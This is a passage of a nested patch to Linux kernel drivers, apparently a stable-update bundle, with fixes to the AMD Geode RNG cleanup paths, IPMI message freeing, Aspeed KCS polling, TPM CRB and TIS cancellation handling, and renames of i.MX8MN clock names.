++		goto free_priv;
++
++	geode_rng.priv = (unsigned long)priv;
++	priv->membase = mem;
++	priv->pcidev = pdev;
+ 
+ 	pr_info("AMD Geode RNG detected\n");
+ 	err = hwrng_register(&geode_rng);
+@@ -116,20 +130,26 @@ found:
+ 		       err);
+ 		goto err_unmap;
+ 	}
+-out:
+ 	return err;
+ 
+ err_unmap:
+ 	iounmap(mem);
+-	goto out;
++free_priv:
++	kfree(priv);
++put_dev:
++	pci_dev_put(pdev);
++	return err;
+ }
+ 
+ static void __exit geode_rng_exit(void)
+ {
+-	void __iomem *mem = (void __iomem *)geode_rng.priv;
++	struct amd_geode_priv *priv;
+ 
++	priv = (struct amd_geode_priv *)geode_rng.priv;
+ 	hwrng_unregister(&geode_rng);
+-	iounmap(mem);
++	iounmap(priv->membase);
++	pci_dev_put(priv->pcidev);
++	kfree(priv);
+ }
+ 
+ module_init(geode_rng_init);
+diff --git a/drivers/char/ipmi/ipmi_msghandler.c b/drivers/char/ipmi/ipmi_msghandler.c
+index 49a1707693c9f..d5ee52be176d3 100644
+--- a/drivers/char/ipmi/ipmi_msghandler.c
++++ b/drivers/char/ipmi/ipmi_msghandler.c
+@@ -3704,12 +3704,16 @@ static void deliver_smi_err_response(struct ipmi_smi *intf,
+ 				     struct ipmi_smi_msg *msg,
+ 				     unsigned char err)
+ {
++	int rv;
+ 	msg->rsp[0] = msg->data[0] | 4;
+ 	msg->rsp[1] = msg->data[1];
+ 	msg->rsp[2] = err;
+ 	msg->rsp_size = 3;
+-	/* It's an error, so it will never requeue, no need to check return. */
+-	handle_one_recv_msg(intf, msg);
++
++	/* This will never requeue, but it may ask us to free the message. */
++	rv = handle_one_recv_msg(intf, msg);
++	if (rv == 0)
++		ipmi_free_smi_msg(msg);
+ }
+ 
+ static void cleanup_smi_msgs(struct ipmi_smi *intf)
+diff --git a/drivers/char/ipmi/kcs_bmc_aspeed.c b/drivers/char/ipmi/kcs_bmc_aspeed.c
+index 19c32bf50e0e9..2dea8cd5a09ac 100644
+--- a/drivers/char/ipmi/kcs_bmc_aspeed.c
++++ b/drivers/char/ipmi/kcs_bmc_aspeed.c
+@@ -406,13 +406,31 @@ static void aspeed_kcs_check_obe(struct timer_list *timer)
+ static void aspeed_kcs_irq_mask_update(struct kcs_bmc_device *kcs_bmc, u8 mask, u8 state)
+ {
+ 	struct aspeed_kcs_bmc *priv = to_aspeed_kcs_bmc(kcs_bmc);
++	int rc;
++	u8 str;
+ 
+ 	/* We don't have an OBE IRQ, emulate it */
+ 	if (mask & KCS_BMC_EVENT_TYPE_OBE) {
+-		if (KCS_BMC_EVENT_TYPE_OBE & state)
+-			mod_timer(&priv->obe.timer, jiffies + OBE_POLL_PERIOD);
+-		else
++		if (KCS_BMC_EVENT_TYPE_OBE & state) {
++			/*
++			 * Given we don't have an OBE IRQ, delay by polling briefly to see if we can
++			 * observe such an event before returning to the caller. This is not
++			 * incorrect because OBF may have already become clear before enabling the
++			 * IRQ if we had one, under which circumstance no event will be propagated
++			 * anyway.
++			 *
++			 * The onus is on the client to perform a race-free check that it hasn't
++			 * missed the event.
++			 */
++			rc = read_poll_timeout_atomic(aspeed_kcs_inb, str,
++						      !(str & KCS_BMC_STR_OBF), 1, 100, false,
++						      &priv->kcs_bmc, priv->kcs_bmc.ioreg.str);
++			/* Time for the slow path? */
++			if (rc == -ETIMEDOUT)
++				mod_timer(&priv->obe.timer, jiffies + OBE_POLL_PERIOD);
++		} else {
+ 			del_timer(&priv->obe.timer);
++		}
+ 	}
+ 
+ 	if (mask & KCS_BMC_EVENT_TYPE_IBF) {
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 18606651d1aa4..65f8f179a27f0 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -252,7 +252,7 @@ static int __crb_relinquish_locality(struct device *dev,
+ 	iowrite32(CRB_LOC_CTRL_RELINQUISH, &priv->regs_h->loc_ctrl);
+ 	if (!crb_wait_for_reg_32(&priv->regs_h->loc_state, mask, value,
+ 				 TPM2_TIMEOUT_C)) {
+-		dev_warn(dev, "TPM_LOC_STATE_x.requestAccess timed out\n");
++		dev_warn(dev, "TPM_LOC_STATE_x.Relinquish timed out\n");
+ 		return -ETIME;
+ 	}
+ 
+diff --git a/drivers/char/tpm/tpm_ftpm_tee.c b/drivers/char/tpm/tpm_ftpm_tee.c
+index 5c233423c56fa..deff23bb54bf1 100644
+--- a/drivers/char/tpm/tpm_ftpm_tee.c
++++ b/drivers/char/tpm/tpm_ftpm_tee.c
+@@ -397,7 +397,13 @@ static int __init ftpm_mod_init(void)
+ 	if (rc)
+ 		return rc;
+ 
+-	return driver_register(&ftpm_tee_driver.driver);
++	rc = driver_register(&ftpm_tee_driver.driver);
++	if (rc) {
++		platform_driver_unregister(&ftpm_tee_plat_driver);
++		return rc;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit ftpm_mod_exit(void)
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 757623bacfd50..3f98e587b3e84 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -682,15 +682,19 @@ static bool tpm_tis_req_canceled(struct tpm_chip *chip, u8 status)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	switch (priv->manufacturer_id) {
+-	case TPM_VID_WINBOND:
+-		return ((status == TPM_STS_VALID) ||
+-			(status == (TPM_STS_VALID | TPM_STS_COMMAND_READY)));
+-	case TPM_VID_STM:
+-		return (status == (TPM_STS_VALID | TPM_STS_COMMAND_READY));
+-	default:
+-		return (status == TPM_STS_COMMAND_READY);
++	if (!test_bit(TPM_TIS_DEFAULT_CANCELLATION, &priv->flags)) {
++		switch (priv->manufacturer_id) {
++		case TPM_VID_WINBOND:
++			return ((status == TPM_STS_VALID) ||
++				(status == (TPM_STS_VALID | TPM_STS_COMMAND_READY)));
++		case TPM_VID_STM:
++			return (status == (TPM_STS_VALID | TPM_STS_COMMAND_READY));
++		default:
++			break;
++		}
+ 	}
++
++	return status == TPM_STS_COMMAND_READY;
+ }
+ 
+ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index 66a5a13cd1df2..b68479e0de10f 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -86,6 +86,7 @@ enum tis_defaults {
+ enum tpm_tis_flags {
+ 	TPM_TIS_ITPM_WORKAROUND		= BIT(0),
+ 	TPM_TIS_INVALID_STATUS		= BIT(1),
++	TPM_TIS_DEFAULT_CANCELLATION	= BIT(2),
+ };
+ 
+ struct tpm_tis_data {
+diff --git a/drivers/char/tpm/tpm_tis_i2c.c b/drivers/char/tpm/tpm_tis_i2c.c
+index 0692510dfcab9..f3a7251c8e38f 100644
+--- a/drivers/char/tpm/tpm_tis_i2c.c
++++ b/drivers/char/tpm/tpm_tis_i2c.c
+@@ -49,7 +49,7 @@
+ 
+ /* Masks with bits that must be read zero */
+ #define TPM_ACCESS_READ_ZERO 0x48
+-#define TPM_INT_ENABLE_ZERO 0x7FFFFF6
++#define TPM_INT_ENABLE_ZERO 0x7FFFFF60
+ #define TPM_STS_READ_ZERO 0x23
+ #define TPM_INTF_CAPABILITY_ZERO 0x0FFFF000
+ #define TPM_I2C_INTERFACE_CAPABILITY_ZERO 0x80000000
+@@ -329,6 +329,7 @@ static int tpm_tis_i2c_probe(struct i2c_client *dev,
+ 	if (!phy->io_buf)
+ 		return -ENOMEM;
+ 
++	set_bit(TPM_TIS_DEFAULT_CANCELLATION, &phy->priv.flags);
+ 	phy->i2c_client = dev;
+ 
+ 	/* must precede all communication with the tpm */
+diff --git a/drivers/clk/imx/clk-imx8mn.c b/drivers/clk/imx/clk-imx8mn.c
+index d37c45b676abe..2afea905f7f3c 100644
+--- a/drivers/clk/imx/clk-imx8mn.c
++++ b/drivers/clk/imx/clk-imx8mn.c
+@@ -27,10 +27,10 @@ static u32 share_count_nand;
+ static const char * const pll_ref_sels[] = { "osc_24m", "dummy", "dummy", "dummy", };
+ static const char * const audio_pll1_bypass_sels[] = {"audio_pll1", "audio_pll1_ref_sel", };
+ static const char * const audio_pll2_bypass_sels[] = {"audio_pll2", "audio_pll2_ref_sel", };
+-static const char * const video_pll1_bypass_sels[] = {"video_pll1", "video_pll1_ref_sel", };
++static const char * const video_pll_bypass_sels[] = {"video_pll", "video_pll_ref_sel", };
+ static const char * const dram_pll_bypass_sels[] = {"dram_pll", "dram_pll_ref_sel", };
+ static const char * const gpu_pll_bypass_sels[] = {"gpu_pll", "gpu_pll_ref_sel", };
+-static const char * const vpu_pll_bypass_sels[] = {"vpu_pll", "vpu_pll_ref_sel", };
++static const char * const m7_alt_pll_bypass_sels[] = {"m7_alt_pll", "m7_alt_pll_ref_sel", };
+ static const char * const arm_pll_bypass_sels[] = {"arm_pll", "arm_pll_ref_sel", };
+ static const char * const sys_pll3_bypass_sels[] = {"sys_pll3", "sys_pll3_ref_sel", };
+ 
+@@ -40,24 +40,24 @@ static const char * const imx8mn_a53_sels[] = {"osc_24m", "arm_pll_out", "sys_pl
+ 
+ static const char * const imx8mn_a53_core_sels[] = {"arm_a53_div", "arm_pll_out", };
+ 
+-static const char * const imx8mn_m7_sels[] = {"osc_24m", "sys_pll2_200m", "sys_pll2_250m", "vpu_pll_out",
+-				       "sys_pll1_800m", "audio_pll1_out", "video_pll1_out", "sys_pll3_out", };
++static const char * const imx8mn_m7_sels[] = {"osc_24m", "sys_pll2_200m", "sys_pll2_250m", "m7_alt_pll_out",
++				       "sys_pll1_800m", "audio_pll1_out", "video_pll_out", "sys_pll3_out", };
+ 
+ static const char * const imx8mn_gpu_core_sels[] = {"osc_24m", "gpu_pll_out", "sys_pll1_800m",
+ 						    "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						    "video_pll1_out", "audio_pll2_out", };
++						    "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_gpu_shader_sels[] = {"osc_24m", "gpu_pll_out", "sys_pll1_800m",
+ 						      "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						      "video_pll1_out", "audio_pll2_out", };
++						      "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_main_axi_sels[] = {"osc_24m", "sys_pll2_333m", "sys_pll1_800m",
+ 						    "sys_pll2_250m", "sys_pll2_1000m", "audio_pll1_out",
+-						    "video_pll1_out", "sys_pll1_100m",};
++						    "video_pll_out", "sys_pll1_100m",};
+ 
+ static const char * const imx8mn_enet_axi_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll1_800m",
+ 						    "sys_pll2_250m", "sys_pll2_200m", "audio_pll1_out",
+-						    "video_pll1_out", "sys_pll3_out", };
++						    "video_pll_out", "sys_pll3_out", };
+ 
+ static const char * const imx8mn_nand_usdhc_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll1_800m",
+ 						      "sys_pll2_200m", "sys_pll1_133m", "sys_pll3_out",
+@@ -77,23 +77,23 @@ static const char * const imx8mn_usb_bus_sels[] = {"osc_24m", "sys_pll2_500m", "
+ 
+ static const char * const imx8mn_gpu_axi_sels[] = {"osc_24m", "sys_pll1_800m", "gpu_pll_out",
+ 						   "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						   "video_pll1_out", "audio_pll2_out", };
++						   "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_gpu_ahb_sels[] = {"osc_24m", "sys_pll1_800m", "gpu_pll_out",
+ 						   "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						   "video_pll1_out", "audio_pll2_out", };
++						   "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_noc_sels[] = {"osc_24m", "sys_pll1_800m", "sys_pll3_out",
+ 					       "sys_pll2_1000m", "sys_pll2_500m", "audio_pll1_out",
+-					       "video_pll1_out", "audio_pll2_out", };
++					       "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_ahb_sels[] = {"osc_24m", "sys_pll1_133m", "sys_pll1_800m",
+ 					       "sys_pll1_400m", "sys_pll2_125m", "sys_pll3_out",
+-					       "audio_pll1_out", "video_pll1_out", };
++					       "audio_pll1_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_audio_ahb_sels[] = {"osc_24m", "sys_pll2_500m", "sys_pll1_800m",
+ 						     "sys_pll2_1000m", "sys_pll2_166m", "sys_pll3_out",
+-						     "audio_pll1_out", "video_pll1_out", };
++						     "audio_pll1_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_dram_alt_sels[] = {"osc_24m", "sys_pll1_800m", "sys_pll1_100m",
+ 						    "sys_pll2_500m", "sys_pll2_1000m", "sys_pll3_out",
+@@ -103,49 +103,49 @@ static const char * const imx8mn_dram_apb_sels[] = {"osc_24m", "sys_pll2_200m",
+ 						    "sys_pll1_160m", "sys_pll1_800m", "sys_pll3_out",
+ 						    "sys_pll2_250m", "audio_pll2_out", };
+ 
+-static const char * const imx8mn_disp_pixel_sels[] = {"osc_24m", "video_pll1_out", "audio_pll2_out",
++static const char * const imx8mn_disp_pixel_sels[] = {"osc_24m", "video_pll_out", "audio_pll2_out",
+ 						      "audio_pll1_out", "sys_pll1_800m", "sys_pll2_1000m",
+ 						      "sys_pll3_out", "clk_ext4", };
+ 
+ static const char * const imx8mn_sai2_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+-						"clk_ext3", "clk_ext4", };
++						"video_pll_out", "sys_pll1_133m", "dummy",
++						"clk_ext2", "clk_ext3", };
+ 
+ static const char * const imx8mn_sai3_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext3", "clk_ext4", };
+ 
+ static const char * const imx8mn_sai5_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext2", "clk_ext3", };
+ 
+ static const char * const imx8mn_sai6_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext3", "clk_ext4", };
+ 
+ static const char * const imx8mn_sai7_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext3", "clk_ext4", };
+ 
+ static const char * const imx8mn_spdif1_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						  "video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						  "video_pll_out", "sys_pll1_133m", "dummy",
+ 						  "clk_ext2", "clk_ext3", };
+ 
+ static const char * const imx8mn_enet_ref_sels[] = {"osc_24m", "sys_pll2_125m", "sys_pll2_50m",
+ 						    "sys_pll2_100m", "sys_pll1_160m", "audio_pll1_out",
+-						    "video_pll1_out", "clk_ext4", };
++						    "video_pll_out", "clk_ext4", };
+ 
+ static const char * const imx8mn_enet_timer_sels[] = {"osc_24m", "sys_pll2_100m", "audio_pll1_out",
+ 						      "clk_ext1", "clk_ext2", "clk_ext3",
+-						      "clk_ext4", "video_pll1_out", };
++						      "clk_ext4", "video_pll_out", };
+ 
+ static const char * const imx8mn_enet_phy_sels[] = {"osc_24m", "sys_pll2_50m", "sys_pll2_125m",
+-						    "sys_pll2_200m", "sys_pll2_500m", "video_pll1_out",
+-						    "audio_pll2_out", };
++						    "sys_pll2_200m", "sys_pll2_500m", "audio_pll1_out",
++						    "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_nand_sels[] = {"osc_24m", "sys_pll2_500m", "audio_pll1_out",
+ 						"sys_pll1_400m", "audio_pll2_out", "sys_pll3_out",
+-						"sys_pll2_250m", "video_pll1_out", };
++						"sys_pll2_250m", "video_pll_out", };
+ 
+ static const char * const imx8mn_qspi_sels[] = {"osc_24m", "sys_pll1_400m", "sys_pll2_333m",
+ 						"sys_pll2_500m", "audio_pll2_out", "sys_pll1_266m",
+@@ -160,19 +160,19 @@ static const char * const imx8mn_usdhc2_sels[] = {"osc_24m", "sys_pll1_400m", "s
+ 						  "audio_pll2_out", "sys_pll1_100m", };
+ 
+ static const char * const imx8mn_i2c1_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out", "audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out", "audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_i2c2_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out", "audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out", "audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_i2c3_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out", "audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out", "audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_i2c4_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out",	"audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out",	"audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_uart1_sels[] = {"osc_24m", "sys_pll1_80m", "sys_pll2_200m",
+@@ -213,63 +213,63 @@ static const char * const imx8mn_ecspi2_sels[] = {"osc_24m", "sys_pll2_200m", "s
+ 
+ static const char * const imx8mn_pwm1_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext1",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_pwm2_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext1",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_pwm3_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext2",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_pwm4_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext2",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_gpt1_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt2_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt3_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt4_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt5_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt6_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_wdog_sels[] = {"osc_24m", "sys_pll1_133m", "sys_pll1_160m",
+-						"vpu_pll_out", "sys_pll2_125m", "sys_pll3_out",
++						"m7_alt_pll_out", "sys_pll2_125m", "sys_pll3_out",
+ 						"sys_pll1_80m", "sys_pll2_166m", };
+ 
+-static const char * const imx8mn_wrclk_sels[] = {"osc_24m", "sys_pll1_40m", "vpu_pll_out",
++static const char * const imx8mn_wrclk_sels[] = {"osc_24m", "sys_pll1_40m", "m7_alt_pll_out",
+ 						 "sys_pll3_out", "sys_pll2_200m", "sys_pll1_266m",
+ 						 "sys_pll2_500m", "sys_pll1_100m", };
+ 
+ static const char * const imx8mn_dsi_core_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll2_250m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+-						    "audio_pll2_out", "video_pll1_out", };
++						    "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_dsi_phy_sels[] = {"osc_24m", "sys_pll2_125m", "sys_pll2_100m",
+ 						   "sys_pll1_800m", "sys_pll2_1000m", "clk_ext2",
+-						   "audio_pll2_out", "video_pll1_out", };
++						   "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_dsi_dbi_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll2_100m",
+ 						   "sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+-						   "audio_pll2_out", "video_pll1_out", };
++						   "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_usdhc3_sels[] = {"osc_24m", "sys_pll1_400m", "sys_pll1_800m",
+ 						  "sys_pll2_500m", "sys_pll3_out", "sys_pll1_266m",
+@@ -277,15 +277,15 @@ static const char * const imx8mn_usdhc3_sels[] = {"osc_24m", "sys_pll1_400m", "s
+ 
+ static const char * const imx8mn_camera_pixel_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll2_250m",
+ 							"sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+-							"audio_pll2_out", "video_pll1_out", };
++							"audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_csi1_phy_sels[] = {"osc_24m", "sys_pll2_333m", "sys_pll2_100m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "clk_ext2",
+-						    "audio_pll2_out", "video_pll1_out", };
++						    "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_csi2_phy_sels[] = {"osc_24m", "sys_pll2_333m", "sys_pll2_100m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "clk_ext2",
+-						    "audio_pll2_out", "video_pll1_out", };
++						    "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_csi2_esc_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_80m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+@@ -306,9 +306,9 @@ static const char * const imx8mn_clko1_sels[] = {"osc_24m", "sys_pll1_800m", "du
+ 						 "dummy", "sys_pll1_80m", };
+ static const char * const imx8mn_clko2_sels[] = {"osc_24m", "sys_pll2_200m", "sys_pll1_400m",
+ 						 "sys_pll2_166m", "sys_pll3_out", "audio_pll1_out",
+-						 "video_pll1_out", "osc_32k", };
++						 "video_pll_out", "osc_32k", };
+ 
+-static const char * const clkout_sels[] = {"audio_pll1_out", "audio_pll2_out", "video_pll1_out",
++static const char * const clkout_sels[] = {"audio_pll1_out", "audio_pll2_out", "video_pll_out",
+ 					   "dummy", "dummy", "gpu_pll_out", "dummy",
+ 					   "arm_pll_out", "sys_pll1", "sys_pll2", "sys_pll3",
+ 					   "dummy", "dummy", "osc_24m", "dummy", "osc_32k"};
+@@ -349,19 +349,19 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 
+ 	hws[IMX8MN_AUDIO_PLL1_REF_SEL] = imx_clk_hw_mux("audio_pll1_ref_sel", base + 0x0, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_AUDIO_PLL2_REF_SEL] = imx_clk_hw_mux("audio_pll2_ref_sel", base + 0x14, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+-	hws[IMX8MN_VIDEO_PLL1_REF_SEL] = imx_clk_hw_mux("video_pll1_ref_sel", base + 0x28, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
++	hws[IMX8MN_VIDEO_PLL_REF_SEL] = imx_clk_hw_mux("video_pll_ref_sel", base + 0x28, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_DRAM_PLL_REF_SEL] = imx_clk_hw_mux("dram_pll_ref_sel", base + 0x50, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_GPU_PLL_REF_SEL] = imx_clk_hw_mux("gpu_pll_ref_sel", base + 0x64, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+-	hws[IMX8MN_VPU_PLL_REF_SEL] = imx_clk_hw_mux("vpu_pll_ref_sel", base + 0x74, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
++	hws[IMX8MN_M7_ALT_PLL_REF_SEL] = imx_clk_hw_mux("m7_alt_pll_ref_sel", base + 0x74, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_ARM_PLL_REF_SEL] = imx_clk_hw_mux("arm_pll_ref_sel", base + 0x84, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_SYS_PLL3_REF_SEL] = imx_clk_hw_mux("sys_pll3_ref_sel", base + 0x114, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 
+ 	hws[IMX8MN_AUDIO_PLL1] = imx_clk_hw_pll14xx("audio_pll1", "audio_pll1_ref_sel", base, &imx_1443x_pll);
+ 	hws[IMX8MN_AUDIO_PLL2] = imx_clk_hw_pll14xx("audio_pll2", "audio_pll2_ref_sel", base + 0x14, &imx_1443x_pll);
+-	hws[IMX8MN_VIDEO_PLL1] = imx_clk_hw_pll14xx("video_pll1", "video_pll1_ref_sel", base + 0x28, &imx_1443x_pll);
++	hws[IMX8MN_VIDEO_PLL] = imx_clk_hw_pll14xx("video_pll", "video_pll_ref_sel", base + 0x28, &imx_1443x_pll);
+ 	hws[IMX8MN_DRAM_PLL] = imx_clk_hw_pll14xx("dram_pll", "dram_pll_ref_sel", base + 0x50, &imx_1443x_dram_pll);
+ 	hws[IMX8MN_GPU_PLL] = imx_clk_hw_pll14xx("gpu_pll", "gpu_pll_ref_sel", base + 0x64, &imx_1416x_pll);
+-	hws[IMX8MN_VPU_PLL] = imx_clk_hw_pll14xx("vpu_pll", "vpu_pll_ref_sel", base + 0x74, &imx_1416x_pll);
++	hws[IMX8MN_M7_ALT_PLL] = imx_clk_hw_pll14xx("m7_alt_pll", "m7_alt_pll_ref_sel", base + 0x74, &imx_1416x_pll);
+ 	hws[IMX8MN_ARM_PLL] = imx_clk_hw_pll14xx("arm_pll", "arm_pll_ref_sel", base + 0x84, &imx_1416x_pll);
+ 	hws[IMX8MN_SYS_PLL1] = imx_clk_hw_fixed("sys_pll1", 800000000);
+ 	hws[IMX8MN_SYS_PLL2] = imx_clk_hw_fixed("sys_pll2", 1000000000);
+@@ -370,20 +370,20 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 	/* PLL bypass out */
+ 	hws[IMX8MN_AUDIO_PLL1_BYPASS] = imx_clk_hw_mux_flags("audio_pll1_bypass", base, 16, 1, audio_pll1_bypass_sels, ARRAY_SIZE(audio_pll1_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_AUDIO_PLL2_BYPASS] = imx_clk_hw_mux_flags("audio_pll2_bypass", base + 0x14, 16, 1, audio_pll2_bypass_sels, ARRAY_SIZE(audio_pll2_bypass_sels), CLK_SET_RATE_PARENT);
+-	hws[IMX8MN_VIDEO_PLL1_BYPASS] = imx_clk_hw_mux_flags("video_pll1_bypass", base + 0x28, 16, 1, video_pll1_bypass_sels, ARRAY_SIZE(video_pll1_bypass_sels), CLK_SET_RATE_PARENT);
++	hws[IMX8MN_VIDEO_PLL_BYPASS] = imx_clk_hw_mux_flags("video_pll_bypass", base + 0x28, 16, 1, video_pll_bypass_sels, ARRAY_SIZE(video_pll_bypass_sels), CLK_SET_RATE_PARENT);
